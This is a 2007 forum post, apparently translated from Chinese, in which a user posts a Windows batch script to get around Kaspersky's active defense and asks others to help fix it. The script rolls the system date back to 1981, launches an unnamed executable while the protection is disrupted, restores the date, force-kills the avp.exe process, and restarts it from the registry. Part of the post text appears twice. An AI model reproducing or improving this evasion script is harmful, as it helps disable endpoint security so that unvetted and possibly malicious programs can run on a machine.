There is an online batch script that bypasses the Kaspersky active defense, but every time the date is restored, Kaspersky can't quickly respond back and will be unresponsive for about one minute.
I thought of using the method of ending the process and then restoring to make it respond quickly.
But I encountered a strange problem when writing the batch script.
First, post the code
The problem is that after starting Kaspersky, the code after the exit label cannot be executed.
I'm really郁闷
Please help from the experts!!!!!
[ Last edited by heicai on 2007-6-29 at 12:59 PM ]
I thought of using the method of ending the process and then restoring to make it respond quickly.
But I encountered a strange problem when writing the batch script.
First, post the code
@echo off
tasklist|findstr /i "avp.exe" && (
set date=%date%
date 1981-01-01
ping -n 12 localhost > nul
haha.exe
date %date%
taskkill /f /t /im avp.exe
for /f "skip=4 tokens=3-7" %%i in ('reg QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\AVP /v ImagePath
') do (
set avpp=%%i %%j %%k %%l %%m
goto restart
)
:restart
call %avpp%
goto exit
)
:exit
echo 结束
pause
The problem is that after starting Kaspersky, the code after the exit label cannot be executed.
I'm really郁闷
Please help from the experts!!!!!
[ Last edited by heicai on 2007-6-29 at 12:59 PM ]
